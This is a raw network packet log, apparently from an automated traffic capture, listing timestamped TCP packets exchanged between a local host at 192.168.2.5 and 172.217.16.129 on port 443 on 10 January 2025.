                                                                              Jan 10, 2025 23:50:09.943471909 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.943519115 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.947994947 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.948043108 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.948048115 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.948090076 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.952774048 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.952822924 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.952826023 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.952866077 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.957019091 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.957072020 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.957106113 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.957149029 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.961333036 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.961393118 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.961395979 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.961402893 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.961493969 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.965409994 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.965455055 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.965526104 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.965570927 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.969417095 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.969465017 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.969470024 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.969516039 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.973145962 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.973203897 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.973208904 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.973253965 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.976911068 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.976960897 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.976965904 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.977020025 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.980688095 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.980743885 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.980748892 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.980789900 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.984101057 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.984147072 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.984150887 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.984189987 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.987770081 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.987813950 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.987818003 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.987865925 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.991288900 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.991359949 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.991364956 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.991410017 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.993513107 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.993576050 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.993580103 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.993633986 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.995615959 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.995665073 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.995743990 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.995793104 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.997847080 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.997895002 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.997905016 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.997948885 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.000014067 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.000057936 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.000068903 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.000118971 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.002180099 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.002227068 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.002765894 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.002806902 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.004365921 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.004410982 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.004419088 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.004462957 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.006493092 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.006550074 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.006553888 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.006596088 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.008708954 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.008761883 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.008771896 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.008821964 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.010883093 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.010931015 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.010936975 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.010982037 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.013135910 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.013199091 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.013240099 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.013281107 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.015258074 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.015307903 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.015326023 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.015362024 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.017364979 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.017422915 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.017436981 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.017474890 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.019515038 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.019557953 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.019576073 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.019613981 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.021586895 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.021640062 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.021709919 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.021748066 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.023838043 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.023886919 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.023905039 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.023952961 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.025909901 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.025959015 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.025975943 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.026015997 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.027960062 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.028011084 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.028031111 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.028067112 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.030065060 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.030114889 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.030141115 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.030185938 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.032114983 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.032169104 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.032190084 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.032233000 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.034198999 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.034240961 CET49406443192.168.2.5172.217.16.129
Jan 10, 2025 23:50:10.034260988 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.034302950 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.036269903 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.036315918 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.036335945 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.036377907 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.038305044 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.038350105 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.038369894 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.038414955 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.040272951 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.040316105 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.040328979 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.040369987 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.042267084 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.042309999 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.042325974 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.042368889 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.044215918 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.044260025 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.044275999 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.044317007 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.046142101 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.046194077 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.046209097 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.046297073 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.048228025 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.048275948 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.048280954 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.048329115 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.048378944 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.048424006 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.050261021 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.050312996 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.050348043 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.050395966 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.052151918 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.052202940 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.052242041 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.052289963 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.054012060 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.054059982 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.054105043 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.054151058 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.056037903 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.056087971 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.056122065 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.056169033 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.058162928 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.058212996 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.058248997 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.058295965 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.059858084 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.059905052 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.059943914 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.059990883 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.061794043 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.061844110 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.061877012 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.061929941 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.063571930 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.063621998 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.063652039 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.063697100 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.065510988 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.065556049 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.065577984 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.065623045 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.067178965 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.067241907 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.067300081 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.067347050 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.069654942 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.069706917 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.069752932 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.069973946 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.070595026 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.070647955 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.070678949 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.070733070 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.072678089 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.072730064 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.072762966 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.072808981 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.074253082 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.074305058 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.074347973 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.074394941 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.076519012 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.076570988 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.076602936 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.076652050 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.077714920 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.077775002 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.077898979 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.077950954 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.080089092 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.080142975 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.080157042 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.080203056 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.082148075 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.082196951 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.082214117 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.082256079 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.082907915 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.082951069 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.082962036 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.083003998 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.084351063 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.084398031 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.084481001 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.084520102 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.085869074 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.085927010 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.086004972 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.086062908 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.087471962 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.087527037 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.087538004 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.087588072 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.088788033 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.088831902 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.088839054 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.088886023 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.090338945 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.090392113 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.090398073 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.090444088 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.090450048 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.090492010 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.091711044 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.091757059 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.091763020 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.091808081 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.093121052 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.093168020 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.093173981 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.093218088 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.095149994 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.095196009 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.095204115 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.095247984 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.097371101 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.097414970 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.097421885 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.097428083 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.097456932 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.097486973 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.097491026 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.097538948 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.101777077 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.101826906 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.101834059 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.101896048 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.102010012 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.102060080 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.102066994 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.102096081 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.102111101 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.102118969 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.102133036 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.102164030 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.108217001 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.108274937 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.108277082 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.108303070 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.108323097 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.108349085 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.108351946 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.108361006 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.108401060 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.114661932 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.114715099 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.114729881 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.114741087 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.114753008 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.114792109 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.114795923 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.114841938 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.114849091 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.114883900 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.118633986 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.118684053 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.118690968 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.118740082 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.118745089 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.118794918 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.119036913 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.119081974 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.119087934 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.119136095 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.119142056 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.119189024 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.124862909 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.124902010 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.124908924 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.124948025 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.124953985 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.125003099 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.125045061 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.125085115 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.125211954 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.125251055 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.125257969 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.125293016 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.130927086 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.130980968 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.131014109 CET  443    49406  172.217.16.129  192.168.2.5
